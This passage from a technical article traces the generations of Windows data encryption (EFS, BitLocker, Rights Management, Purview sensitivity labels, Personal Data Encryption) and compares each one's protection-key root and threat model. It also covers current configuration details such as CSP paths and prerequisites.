&lt;p&gt;Each year row in this diagram is anchored to a primary source cited inline in the corresponding generation section below: the Windows 2000 EFS milestone [@wikipedia-windows2000], the Windows Server 2003 RMS debut and lineage [@wikipedia-adrms], the November 30, 2006 BitLocker release [@wikipedia-bitlocker], the Azure Rights Management general-availability lineage [@ms-azure-rms], the Microsoft Information Protection brand and its April 2022 consolidation into Microsoft Purview [@ms-purview-launch], the Windows 11 22H2 / 24H2 Personal Data Encryption rollout [@ms-pde-overview], and the Windows Information Protection sunset [@ms-wip-deprecation]. Mermaid syntax does not accept pandoc inline citations inside the diagram body, so the citations live in the prose immediately after.&lt;/p&gt;
&lt;h3&gt;Generation 1 -- EFS (2000)&lt;/h3&gt;
&lt;p&gt;Covered in §2 and §3. One paragraph recap: per-user, per-file, opt-in, RSA-wrapped FEK, user EFS RSA private key sealed by classic DPAPI from the user&apos;s logon secret. Root: the user&apos;s password. Threat model: a different user on the same machine, or a foreign operating system that mounts NTFS without honouring ACLs.&lt;/p&gt;
&lt;h3&gt;Generation 2 -- BitLocker (2006)&lt;/h3&gt;
&lt;p&gt;Six years after EFS, Microsoft moved encryption &lt;em&gt;off&lt;/em&gt; the file and &lt;em&gt;down&lt;/em&gt; to the volume. BitLocker shipped with Windows Vista on November 30, 2006 [@wikipedia-bitlocker]; the consumer launch of Vista that included it followed on January 30, 2007 [@wikipedia-bitlocker]. The cipher in the first BitLocker release was AES-CBC with Niels Ferguson&apos;s Elephant Diffuser, a manipulation-resistance construction documented in the 2006 Microsoft technical paper &lt;em&gt;AES-CBC + Elephant Diffuser: A Disk Encryption Algorithm for Windows Vista&lt;/em&gt; [@ferguson-2006].Niels Ferguson is the named cryptographer behind BitLocker&apos;s original cipher mode. He is the only individual this article names with primary-source confidence. Most other work in this space ships team-attributed.&lt;/p&gt;
&lt;p&gt;Later releases moved to XTS-AES with 128-bit or 256-bit keys; XTS-AES has been the default since a Windows 10 release in the mid-2010s [@wikipedia-bitlocker].&lt;/p&gt;
&lt;p&gt;The cipher mode is not the point. The point is what changed in the &lt;em&gt;root&lt;/em&gt;. BitLocker&apos;s Volume Master Key (VMK) is sealed in the TPM against a set of Platform Configuration Registers, and released automatically when the registers match the expected boot state.&lt;/p&gt;

A key-encrypting key that wraps the Full Volume Encryption Key. If a user changes their password or a new recovery key is escrowed, only the VMK wrappings change -- the entire volume does not need re-encryption. The VMK itself is sealed in the TPM against the platform&apos;s boot-state PCRs and released at boot when the PCRs match [@wikipedia-bitlocker].
&lt;p&gt;The human is removed from the encrypt-this-file decision. There is no per-file opt-in; the volume protects everything, including system files, swap, and hibernation. There is no per-user wrapping; the VMK is one thing, the volume is one thing.&lt;/p&gt;
&lt;p&gt;This is why BitLocker does not subsume EFS. The two layers protect different things. BitLocker protects the volume at rest, before the OS boots; EFS protects per-file per-user &lt;em&gt;after&lt;/em&gt; the OS has mounted the volume and a particular user has logged on. The &quot;BitLocker is on&quot; vignette in §1 is exactly the gap BitLocker structurally cannot close: BitLocker is unlocked the moment the TPM unseals, and the unseal happens before any human authenticates.&lt;/p&gt;

A dedicated BitLocker article on this site covers volume-internal mechanics in depth -- VMK, FVEK, recovery key escrow, TPM+PIN configuration, cipher migration. This article assumes that BitLocker knowledge and concentrates on the *above-volume* layers. The reader who wants the volume internals should read that article alongside this one.
&lt;h3&gt;Generation 3 -- RMS and Azure RMS (2003, 2013-2014)&lt;/h3&gt;
&lt;p&gt;Three years after EFS, Microsoft shipped a completely different shape of file encryption with Windows Server 2003: Rights Management Services. Wikipedia traces the lineage: &lt;em&gt;&quot;Active Directory Rights Management Services (AD RMS, known as Rights Management Services or RMS before Windows Server 2008) is a server software for information rights management shipped with Windows Server&quot;&lt;/em&gt; and &lt;em&gt;&quot;RMS debuted in Windows Server 2003, with client API libraries made available for Windows 2000 and later&quot;&lt;/em&gt; [@wikipedia-adrms].&lt;/p&gt;
&lt;p&gt;RMS solved a different problem from EFS or BitLocker. The question was: &lt;em&gt;can a document remain encrypted when emailed outside the organisation, or copied to a USB stick, or stored in a shared folder a different user has read access to?&lt;/em&gt; EFS could not -- decrypted on cross-protocol copy. BitLocker could not -- the volume is unlocked. RMS introduced a different shape: each protected document carries an envelope that includes a wrapped Content Encryption Key and a policy reference, and decryption requires the consumer to obtain a use license from the RMS service against an authenticated identity.&lt;/p&gt;

A per-content symmetric key generated when a document is protected with a Purview sensitivity label that applies encryption. The CEK is wrapped by the tenant root key (or by the customer-held DKE key, where Double Key Encryption is configured) and travels embedded in the document file alongside policy metadata. Microsoft Learn describes the topology: *&quot;The Azure Rights Management tenant key is your organization&apos;s root key for the main encryption service for Microsoft Purview Information Protection. Other keys can be derived from this root key, including user keys, computer keys, or document encryption keys&quot;* [@ms-byok].

A short-lived authorization artifact issued by the Azure Rights Management service to a specific authenticated user, granting them the rights expressed by the document&apos;s policy (view, edit, print, copy, forward). Microsoft Learn states the cross-organisation default: *&quot;By default, collaboration with other organizations that already have a Microsoft 365 or a Microsoft Entra directory is automatically supported&quot;* [@ms-azure-rms]. A user without a valid use license cannot decrypt the CEK, even if they possess the file.
&lt;p&gt;A few years after AD RMS shipped, Microsoft moved the RMS engine to the cloud as Azure RMS. The protection topology stayed the same: per-content CEK, tenant root key, use-license issuance against an identity service. What changed is that the identity service is now Microsoft Entra ID and the root key sits in Azure (or, with Bring Your Own Key, in an Azure Key Vault customer hold) instead of on a Windows Server. Microsoft Learn defines Azure RMS as &lt;em&gt;&quot;the main cloud-based encryption service from Microsoft Purview Information Protection&quot;&lt;/em&gt; and notes that &lt;em&gt;&quot;Encryption settings remain with your data, even when it leaves your organization&apos;s boundaries&quot;&lt;/em&gt; [@ms-azure-rms].&lt;/p&gt;
&lt;p&gt;This is the &quot;travels with the file&quot; generation. Email a CEK-wrapped DOCX to an external recipient; the recipient still needs a use license from Azure RMS; the document does not become plaintext just because it changed hands.&lt;/p&gt;
&lt;h3&gt;Generation 4 -- MIP, then Microsoft Purview Information Protection (late 2010s, 2022)&lt;/h3&gt;
&lt;p&gt;The late-2010s reorganisation is fundamentally a &lt;em&gt;policy-plane&lt;/em&gt; unification, not a new engine. Azure Information Protection&apos;s classification and labelling, the Office unified labelling client, and a growing set of policy controls were brought together under the Microsoft Information Protection (MIP) name in the late 2010s. The encryption engine underneath stayed Azure RMS.&lt;/p&gt;
&lt;p&gt;In April 2022, the entire compliance, classification, and information-protection portfolio got a single brand: Microsoft Purview. The April 19, 2022 launch blog post explained the consolidation: &lt;em&gt;&quot;To meet the challenges of today&apos;s decentralized, data-rich workplace, we&apos;re introducing Microsoft Purview ... that help you govern, protect, and manage your entire data estate&quot;&lt;/em&gt; [@ms-purview-launch]. The same post&apos;s product-naming table mapped &lt;em&gt;&quot;Microsoft Information Protection&quot;&lt;/em&gt; to &lt;em&gt;&quot;Microsoft Purview Information Protection&quot;&lt;/em&gt; directly. Same engine. Same envelope shape. New name.&lt;/p&gt;
&lt;p&gt;For the practitioner, this matters less than it looks. The on-disk artifact of a Purview-labelled document is the same CEK-wrapped envelope it was under MIP, AIP, and AD RMS. The label is metadata; whether the label &lt;em&gt;applies&lt;/em&gt; encryption depends on the label&apos;s settings. Microsoft Learn states the engine plainly: &lt;em&gt;&quot;Unless you&apos;re using S/MIME for Outlook, encryption that&apos;s applied by sensitivity labels to documents, emails, and meeting invites all use the Azure Rights Management service from Microsoft Purview Information Protection&quot;&lt;/em&gt; [@ms-purview-labels].&lt;/p&gt;
&lt;h3&gt;Generation 5 -- PDE (December 2022)&lt;/h3&gt;
&lt;p&gt;December 8, 2022. Microsoft announced Personal Data Encryption in a Tech Community post with a title that telegraphs the threat model: &lt;em&gt;Introducing Personal Data Encryption, securing user data before login and under lock&lt;/em&gt; [@ms-pde-announcement]. The verbatim contrast with BitLocker, from the same post, is the cleanest statement of the gap PDE closes:&lt;/p&gt;

Bitlocker provides full volume encryption and Bitlocker protected data is available when the device boots up, whereas PDE protected data is available only after the user authenticates to Windows Hello for Business at login or to unlock the screen.
&lt;p&gt;That sentence carries the entire design. BitLocker unlocks at boot. PDE unlocks at Hello sign-in. The post-boot pre-logon window the §1 vignette dwelled in is exactly the window PDE was built to close. PDE shipped with Windows 11 22H2 [@ms-pde-overview]. The cipher is AES-CBC with a 256-bit key [@ms-pde-overview]. The protector binds to a &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello for Business&lt;/a&gt; credential, not to a password.&lt;/p&gt;
&lt;p&gt;The PDE FAQ adds the second key constraint: &lt;em&gt;&quot;the keys used by Personal Data Encryption to encrypt content are protected by Windows Hello credentials and can only be unlocked when signing on with Windows Hello (PIN or biometrics)&quot;&lt;/em&gt; [@ms-pde-faq]. Password sign-in does not unlock PDE content. RDP does not unlock it. Other users on the same machine do not unlock it. We will walk the full mechanism in §5 and §6; for now, register that the root is Windows Hello for Business, not the user&apos;s password.&lt;/p&gt;
&lt;h3&gt;Generation 6 -- PDE for Known Folders (Windows 11 24H2)&lt;/h3&gt;
&lt;p&gt;The 22H2 release of PDE was API-only [@ms-pde-announcement]. Applications could call &lt;code&gt;Windows.Security.DataProtection.UserDataProtectionManager.ProtectStorageItemAsync&lt;/code&gt; to wrap an individual file, but Windows itself did not encrypt anything by default. That changed with Windows 11 24H2.&lt;/p&gt;
&lt;p&gt;Microsoft Learn describes the 24H2 addition: &lt;em&gt;&quot;Starting in Windows 11, version 24H2, Personal Data Encryption is further enhanced with Personal Data Encryption for known folders. Once enabled, the Windows folders Desktop, Documents, and Pictures, along with their contents, are automatically encrypted&quot;&lt;/em&gt; [@ms-pde-overview]. The CSP node tree (configured via Intune or any MDM that speaks &lt;code&gt;./User/Vendor/MSFT/PDE&lt;/code&gt;) gained &lt;code&gt;ProtectFolders/ProtectDesktop&lt;/code&gt;, &lt;code&gt;ProtectFolders/ProtectDocuments&lt;/code&gt;, and &lt;code&gt;ProtectFolders/ProtectPictures&lt;/code&gt; for this purpose [@ms-pde-csp]. The PDE CSP itself was added in 22H2 (build 10.0.22621), while the known-folder nodes are gated to 24H2 (build 10.0.26100) and later [@ms-pde-csp].&lt;/p&gt;
&lt;p&gt;For the first time since EFS, Windows shipped a per-user file-encryption mechanism that did not require the user to opt every individual file in. The default for the three best-known per-user folders -- if the administrator enables it -- is encrypted.&lt;/p&gt;
&lt;h3&gt;The dead-end branch -- Windows Information Protection (2016 to mid-2022)&lt;/h3&gt;
&lt;p&gt;One more entry belongs on the timeline. Windows Information Protection, originally Enterprise Data Protection, was Microsoft&apos;s mid-2010s attempt at &quot;container-style&quot; data separation: corporate files in a container, personal files outside the container, copy-paste between them gated by policy. Microsoft Learn&apos;s &lt;code&gt;/previous-versions/&lt;/code&gt; landing page for WIP states the design intent: &lt;em&gt;&quot;Windows Information Protection (WIP), previously known as enterprise data protection (EDP), helps to protect against this potential data leakage without otherwise interfering with the employee experience&quot;&lt;/em&gt; [@ms-wip-deprecation].&lt;/p&gt;
&lt;p&gt;The same page is candid about the limit: &lt;em&gt;&quot;While Windows Information Protection can stop accidental data leaks from honest employees, it is not intended to stop malicious insiders from removing enterprise data&quot;&lt;/em&gt; [@ms-wip-deprecation]. WIP was sunset in mid-2022 and the recommended replacement was the Microsoft Purview Information Protection plus Microsoft Purview Data Loss Prevention combination [@ms-wip-deprecation].&lt;/p&gt;
&lt;p&gt;Each generation chose a different protection-key root. That is the most important observation in the article -- and it has been hiding in plain sight since 2003.&lt;/p&gt;
&lt;h2&gt;5. Three Layers, Three Roots, Three Threat Models&lt;/h2&gt;
&lt;p&gt;BitLocker, EFS, PDE, and Purview sensitivity labels use four different protection-key roots because each one closes a different gap, and each gap has a different threat model. That is by design.&lt;/p&gt;
&lt;p&gt;The four roots:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Protection-key root&lt;/th&gt;
&lt;th&gt;Sealed by&lt;/th&gt;
&lt;th&gt;Unlocked at&lt;/th&gt;
&lt;th&gt;Granularity&lt;/th&gt;
&lt;th&gt;Travels with file&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;BitLocker&lt;/td&gt;
&lt;td&gt;TPM-sealed VMK&lt;/td&gt;
&lt;td&gt;TPM, against PCRs&lt;/td&gt;
&lt;td&gt;Boot, when PCRs match&lt;/td&gt;
&lt;td&gt;Volume&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EFS&lt;/td&gt;
&lt;td&gt;User EFS RSA private key&lt;/td&gt;
&lt;td&gt;classic DPAPI from logon secret&lt;/td&gt;
&lt;td&gt;First file access in logon session&lt;/td&gt;
&lt;td&gt;File, per-user&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PDE&lt;/td&gt;
&lt;td&gt;DEK bound to Hello credential&lt;/td&gt;
&lt;td&gt;DPAPI-NG protection descriptor&lt;/td&gt;
&lt;td&gt;Hello sign-in (PIN or biometric)&lt;/td&gt;
&lt;td&gt;File, per-Hello-user&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Purview labels&lt;/td&gt;
&lt;td&gt;Per-content CEK wrapped by tenant key&lt;/td&gt;
&lt;td&gt;Azure Key Vault (Microsoft, BYOK, or DKE)&lt;/td&gt;
&lt;td&gt;Use-license issuance by Azure RMS against Entra ID&lt;/td&gt;
&lt;td&gt;Per-content envelope&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Let us walk each root one at a time. The story changes at every row.&lt;/p&gt;

flowchart LR
    subgraph BitLocker
        BL_VMK[VMK] --&amp;gt; BL_TPM[TPM, sealed against PCRs]
    end
    subgraph EFS
        EFS_FEK[Per-file FEK] --&amp;gt; EFS_Priv[User EFS RSA private key]
        EFS_Priv --&amp;gt; EFS_DPAPI[classic DPAPI master key]
        EFS_DPAPI --&amp;gt; EFS_Logon[User logon secret]
    end
    subgraph PDE
        PDE_DEK[Per-file DEK] --&amp;gt; PDE_DPAPING[DPAPI-NG protector]
        PDE_DPAPING --&amp;gt; PDE_Hello[Windows Hello for Business credential]
    end
    subgraph Purview
        P_CEK[Per-content CEK] --&amp;gt; P_Tenant[Tenant root key]
        P_Tenant --&amp;gt; P_KV[Azure Key Vault, BYOK or DKE]
        P_License[Use license] --&amp;gt; P_Entra[Microsoft Entra ID authorization]
    end
&lt;h3&gt;Root 1 -- BitLocker, the TPM-sealed VMK&lt;/h3&gt;
&lt;p&gt;BitLocker terminates at the TPM. The VMK wraps the Full Volume Encryption Key; the TPM seals the VMK against the platform&apos;s PCR measurements; if the boot chain has not been tampered with, the TPM releases the VMK without any human input. That is the entire mechanism, and it is exactly why &quot;BitLocker is on&quot; leaves the gap the §1 vignette walks through. The threat BitLocker addresses is &lt;em&gt;the powered-off device on a thief&apos;s workbench&lt;/em&gt;. It is mute against everything that happens after the OS has booted.&lt;/p&gt;
&lt;h3&gt;Root 2 -- EFS, the user EFS RSA private key sealed by classic DPAPI&lt;/h3&gt;
&lt;p&gt;EFS terminates at the user&apos;s logon credential. Microsoft Learn defines the EFS service surface as a public-key system for individual files [@ms-efs-win32]. Wikipedia walks the chain end to end: per-file FEK, RSA-wrapped to the user&apos;s EFS public key, private key sealed by classic DPAPI from the user&apos;s logon secret [@wikipedia-efs].&lt;/p&gt;
&lt;p&gt;The threat EFS addresses is &lt;em&gt;a different user on the same machine, after both have signed on at one point or another&lt;/em&gt;. It is mute against three other things: the user&apos;s own ransomware (which runs as the user and can decrypt every EFS file the user owns), password reset (which destroys the DPAPI derivation and locks the user out unless a DRA is configured), and cross-protocol copy (decrypted before SMB transit).&lt;/p&gt;
&lt;h3&gt;Root 3 -- PDE, a DPAPI-NG protector bound to a Windows Hello credential&lt;/h3&gt;
&lt;p&gt;PDE terminates at Windows Hello for Business. Microsoft Learn states the binding directly: &lt;em&gt;&quot;Personal Data Encryption is a security feature that provides file-based data encryption capabilities to Windows. It utilizes Windows Hello for Business to link data encryption keys with user credentials&quot;&lt;/em&gt; [@ms-pde-overview]. The PDE FAQ confirms the unlock condition: &lt;em&gt;&quot;the keys used by Personal Data Encryption to encrypt content are protected by Windows Hello credentials and can only be unlocked when signing on with Windows Hello (PIN or biometrics)&quot;&lt;/em&gt; [@ms-pde-faq].&lt;/p&gt;
&lt;p&gt;The likely engineering mechanism is a DPAPI-NG protection descriptor. DPAPI-NG (Microsoft&apos;s &quot;Next Generation&quot; Data Protection API, in Windows 8 and later) is the only Windows API surface that publicly documents Hello-bound key release. Its protection-descriptor grammar accepts a small set of principal types, documented at Microsoft Learn: &lt;code&gt;SID=&lt;/code&gt;, &lt;code&gt;SDDL=&lt;/code&gt;, &lt;code&gt;LOCAL=user&lt;/code&gt;, &lt;code&gt;LOCAL=machine&lt;/code&gt;, &lt;code&gt;WEBCREDENTIALS=&lt;/code&gt;, &lt;code&gt;CERTIFICATE=HashID:sha1_hash_of_certificate&lt;/code&gt;, and &lt;code&gt;CERTIFICATE=CertBlob:base64String&lt;/code&gt; [@ms-protection-descriptors]. Microsoft&apos;s own protection-descriptor reference adds: &lt;em&gt;&quot;The protection descriptor you specify automatically determines which key protection provider is used&quot;&lt;/em&gt; [@ms-protection-descriptors].&lt;/p&gt;

The rule string passed to `NCryptCreateProtectionDescriptor` that names the principal or principals whose authentication will be required to unwrap a protected blob. The protection descriptor is the place in DPAPI-NG where &quot;encrypted only for this Hello-bound principal&quot; is expressed. Microsoft Learn documents the rule grammar (SID, SDDL, LOCAL, WEBCREDENTIALS, CERTIFICATE) and the use of `AND` and `OR` connectors to combine principals [@ms-protection-descriptors].
&lt;p&gt;Microsoft has not published a mechanism document that says, in those words, &lt;em&gt;&quot;PDE uses &lt;code&gt;NCryptProtectSecret&lt;/code&gt; with a protection descriptor naming the Windows Hello for Business credential.&quot;&lt;/em&gt; What Microsoft has published is the binding (&quot;it utilizes Windows Hello for Business to link data encryption keys with user credentials&quot;) and the API surface (&quot;DPAPI-NG, with Hello-aware protectors&quot;). The two compose in exactly one way that fits the verified primaries. Treat the protection-descriptor binding as the likely engineering mechanism rather than the directly-stated one.The DPAPI-NG protection-descriptor grammar is broader than just Hello. The same API surface backs WinRT user-profile secrets, web-credentials-vault items, and certificate-protected blobs. PDE is one consumer; the API itself is general.&lt;/p&gt;

flowchart TD
    Plain[Plaintext file] --&amp;gt;|AES-CBC 256-bit| Cipher[Ciphertext on NTFS]
    DEK[Per-file Data Encryption Key] --&amp;gt;|wrap| DPAPING[DPAPI-NG NCryptProtectSecret]
    DPAPING --&amp;gt;|protection descriptor| Desc[&quot;Hello-bound principal, likely SID or LOCAL=user&quot;]
    Desc --&amp;gt; HelloKey[Hello-bound asymmetric key in TPM]
    HelloKey --&amp;gt;|released by| Auth[Windows Hello PIN or biometric sign-in]
&lt;p&gt;The arrows above are the cleanest single-page summary of PDE. From Microsoft Learn: the file body uses &lt;em&gt;&quot;AES-CBC with a 256-bit key&quot;&lt;/em&gt; [@ms-pde-overview]. From the PDE FAQ: &lt;em&gt;&quot;the keys used by Personal Data Encryption to encrypt content are protected by Windows Hello credentials and can only be unlocked when signing on with Windows Hello (PIN or biometrics)&quot;&lt;/em&gt; [@ms-pde-faq]. From the DPAPI-NG reference: the API surface includes &lt;code&gt;NCryptCreateProtectionDescriptor&lt;/code&gt;, &lt;code&gt;NCryptProtectSecret&lt;/code&gt;, and &lt;code&gt;NCryptUnprotectSecret&lt;/code&gt; for exactly this purpose [@ms-dpapi-ng]. From the protection-descriptor reference: the rule grammar accepts principal types that include SID and LOCAL principals, which is where the Hello-bound binding lives [@ms-protection-descriptors].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PDE uses AES-CBC, not an authenticated mode like AES-GCM. CBC is malleable: an attacker who can modify ciphertext on disk can flip predictable bits in plaintext. The argument that closes this gap is composition: PDE expects to run on top of BitLocker, whose modern default is XTS-AES [@wikipedia-bitlocker]. PDE&apos;s CBC mode by itself has no manipulation resistance; PDE composed with BitLocker inherits BitLocker&apos;s XTS-AES floor. This composition is intentional. Microsoft&apos;s own recommendation is to run PDE under BitLocker: &lt;em&gt;&quot;it&apos;s recommended to encrypt all volumes with BitLocker Drive Encryption for increased security&quot;&lt;/em&gt; [@ms-pde-faq].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The threat PDE addresses is &lt;em&gt;the laptop at the lock screen with a plaintext volume, in the user&apos;s own absence&lt;/em&gt;. PDE files are unreadable until the user re-authenticates to Hello, even though BitLocker has long since released the volume.&lt;/p&gt;
&lt;p&gt;This is, importantly, the &lt;em&gt;only&lt;/em&gt; place in the four-layer story where &quot;DPAPI-NG is involved&quot; is true. EFS uses classic DPAPI, not DPAPI-NG. Purview labels use Azure RMS, not DPAPI-NG. BitLocker uses neither. The folk-knowledge framing &quot;DPAPI-NG under everything&quot; collapses three different roots into one and obscures the actual architecture.&lt;/p&gt;
&lt;h3&gt;Root 4 -- Purview labels, the Azure RMS tenant key plus Entra ID authorization&lt;/h3&gt;
&lt;p&gt;Purview sensitivity labels (where the label applies encryption) terminate at the Azure Rights Management tenant key and at Microsoft Entra ID. Microsoft Learn states the engine: &lt;em&gt;&quot;Unless you&apos;re using S/MIME for Outlook, encryption that&apos;s applied by sensitivity labels to documents, emails, and meeting invites all use the Azure Rights Management service from Microsoft Purview Information Protection&quot;&lt;/em&gt; [@ms-purview-labels].&lt;/p&gt;
&lt;p&gt;The on-disk envelope contains the wrapped CEK and policy metadata, &lt;em&gt;and the wrapped CEK can be re-issued to any authorised principal&lt;/em&gt;. When Bob in Contoso emails an &quot;Internal&quot; labelled DOCX to Alice in Fabrikam, Azure RMS issues Alice a use license against her Entra ID identity, provided that the document&apos;s policy admits her. The cross-organisation default is on by default [@ms-azure-rms].&lt;/p&gt;
&lt;p&gt;The tenant root can vary. Microsoft Learn describes the topology: &lt;em&gt;&quot;The root key for your Azure Rights Management service can either be: Generated by Microsoft ... Generated by customers with Bring Your Own Key (BYOK)&quot;&lt;/em&gt; [@ms-byok]. Above BYOK sits Double Key Encryption, which puts a customer-controlled key in series with the Azure-held key.&lt;/p&gt;

A two-key model on top of Purview&apos;s tenant root, in which decryption requires both an Azure-held key and an on-premises customer-held key. Microsoft Learn states the design: *&quot;DKE lets you maintain control of your encryption keys. It uses two keys to protect data; one key in your control and a second key you store securely in Microsoft Azure. You maintain control of one of your keys using the Double Key Encryption service. Viewing data protected with Double Key Encryption requires access to both keys&quot;* [@ms-dke]. The same page adds the operational consequence: *&quot;DKE encrypted data isn&apos;t accessible at rest to Microsoft 365 services including Copilot&quot;* [@ms-dke].
&lt;p&gt;The threat Purview labels address is &lt;em&gt;the file that leaves the organisation&lt;/em&gt;. A Purview-encrypted file emailed to a personal Gmail account, copied to a USB stick, uploaded to a third-party SaaS -- still encrypted, still requires a use license from Azure RMS against an authenticated identity, still subject to the policy the original author attached. BitLocker, EFS, and PDE all stop at the local volume or local user; Purview labels are the only one of the four that follows the file across machines, tenants, and protocols.&lt;/p&gt;
&lt;h3&gt;The asymmetry is the design&lt;/h3&gt;
&lt;p&gt;A single unifying root would have collapsed real distinctions. If everything terminated at the TPM, no protection could survive the file leaving the device. If everything terminated at the user&apos;s password, no per-content cross-tenant story would be possible. If everything terminated at Entra ID, the offline laptop at a lock screen would have no answer when the network is unreachable. The four-root architecture is what it is because the four threats are what they are.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Three layers, three protection-key roots, three threat models. The asymmetry is the point: each root exists precisely because the threats are different. A single unified root would not be an improvement -- it would collapse real distinctions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now that you know the roots, you can ask the right questions about the state of the art: what does each layer ship today, and how do you compose them?&lt;/p&gt;
&lt;h2&gt;6. State of the Art: Each Layer in 2026&lt;/h2&gt;
&lt;p&gt;Each layer ships today, supported, documented, and deployed. Here is what each one actually looks like as of mid-2026.&lt;/p&gt;
&lt;h3&gt;EFS in 2026&lt;/h3&gt;
&lt;p&gt;EFS still ships in Windows 11 and Windows Server 2025. It is documented at the Win32 file-encryption reference [@ms-efs-win32]. It is deprecated for new development -- the recommended replacement for new per-file scenarios on Entra-joined Hello-using devices is PDE [@ms-pde-faq] -- but the implementation is intact, Group Policy still ships DRA configuration, and existing EFS-encrypted files continue to work.&lt;/p&gt;
&lt;p&gt;What EFS does not work on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;ReFS before 24H2&lt;/em&gt;. Historically the &lt;code&gt;$EFS&lt;/code&gt; attribute had no home on ReFS, so EFS-protected files were decrypted in transit when copied to a ReFS volume. Windows 11 24H2 and Windows Server 2025 added file-system-encryption support to ReFS [@wikipedia-efs], so the absolute &quot;no home&quot; framing is now out of date; on older ReFS, the cryptography still ends at the volume boundary.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;FAT32 / exFAT on legacy Windows&lt;/em&gt;. Wikipedia notes that &lt;em&gt;&quot;Files and folders are decrypted before being copied to a volume formatted with another file system, like FAT32&quot;&lt;/em&gt; [@wikipedia-efs]. Windows 10 1607 and Windows Server 2016 added EFS support on FAT and exFAT [@wikipedia-efs], which softens the absolute version of that statement; the cryptography still ends at SMB transit and at any destination the source EFS service does not recognise as compatible.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;System files and root directories&lt;/em&gt;. Not encryptable; the chicken-and-egg problem of needing to read the user&apos;s profile before the user has authenticated.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Compressed files&lt;/em&gt;. EFS and NTFS file compression are mutually exclusive on the same file.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The default cipher inside the FEK has been AES since Windows XP SP1 [@wikipedia-efs]; the default key size moved from AES-128 to AES-256 in a later Windows 10 release. Operationally, the most common source of confusion is &lt;code&gt;cipher.exe /K&lt;/code&gt;, which generates a fresh self-signed EFS certificate for the current user if one does not already exist; the certificate goes into the user&apos;s personal store, the private key into &lt;code&gt;%APPDATA%\Microsoft\Crypto\RSA\&amp;lt;SID&amp;gt;\&lt;/code&gt;, and the EFS service in &lt;code&gt;lsass.exe&lt;/code&gt; from then on prefers the new certificate for new wraps. Existing EFS files do not rewrap themselves.&lt;/p&gt;
&lt;p&gt;The DRA story works cleanly only in classic AD-domain deployments where Group Policy can push a recovery-agent certificate to every machine and the EFS service knows to add the DRA wrapper at encryption time. In an Entra-joined-only environment, the AD-domain DRA story does not transplant cleanly; this is one of the seven live operational problems we will catalogue in §9.&lt;/p&gt;
&lt;h3&gt;PDE in 2026&lt;/h3&gt;
&lt;p&gt;Personal Data Encryption ships on Windows 11 22H2 and later, in Enterprise and Education SKUs [@ms-pde-overview]. As of Windows 11 24H2, the known-folder auto-encryption mode brings Desktop, Documents, and Pictures under PDE without requiring per-file API calls [@ms-pde-overview].&lt;/p&gt;
&lt;p&gt;The prerequisites are strict, and they are spelled out on the PDE overview page: &lt;em&gt;&quot;The devices must be Microsoft Entra joined or Microsoft Entra hybrid joined. Domain-joined devices aren&apos;t supported&quot;&lt;/em&gt; and &lt;em&gt;&quot;Automatic Restart Sign On (ARSO) must be disabled&quot;&lt;/em&gt; [@ms-pde-overview]. The configure page emphasises the ARSO point: &lt;em&gt;&quot;Winlogon automatic restart sign-on (ARSO) isn&apos;t supported for use with Personal Data Encryption. To use Personal Data Encryption, ARSO must be disabled&quot;&lt;/em&gt; [@ms-pde-configure].&lt;/p&gt;
&lt;p&gt;PDE has two protection levels, defined by how long after sign-in the content remains decrypted in memory. The original announcement explains both:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&quot;Level 1(L1) security protects contents during the early boot stage -- from the time that the machines boots, until the user logs in using Windows Hello for Business credentials. Level 2(L2) security protects data from the time the user&apos;s device locks till the device is unlocked using Windows Hello for Business credentials.&quot;&lt;/em&gt; [@ms-pde-announcement]&lt;/p&gt;
&lt;p&gt;L1 is &quot;protected from boot until first sign-in.&quot; L2 is &quot;protected from lock until next unlock.&quot; L1 is the default; L2 is opt-in and stricter, because re-decrypting on every unlock is more disruptive to apps that hold open file handles.&lt;/p&gt;
&lt;p&gt;The Configuration Service Provider node tree:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;./User/Vendor/MSFT/PDE/EnablePersonalDataEncryption&lt;/code&gt; -- introduced in 22H2, build 10.0.22621 [@ms-pde-csp].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;./User/Vendor/MSFT/PDE/ProtectFolders/ProtectDesktop&lt;/code&gt; -- introduced in 24H2, build 10.0.26100 [@ms-pde-csp].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;./User/Vendor/MSFT/PDE/ProtectFolders/ProtectDocuments&lt;/code&gt; -- 24H2 [@ms-pde-csp].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;./User/Vendor/MSFT/PDE/ProtectFolders/ProtectPictures&lt;/code&gt; -- 24H2 [@ms-pde-csp].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An earlier draft of this article&apos;s research wrote these paths without the &lt;code&gt;ProtectFolders&lt;/code&gt; parent node, and so do several blog posts on the public web. The Microsoft Learn CSP reference is authoritative: the folder-protection nodes nest under &lt;code&gt;ProtectFolders&lt;/code&gt;. Practitioners running CSP queries against the un-nested path will see them return no value.&lt;/p&gt;
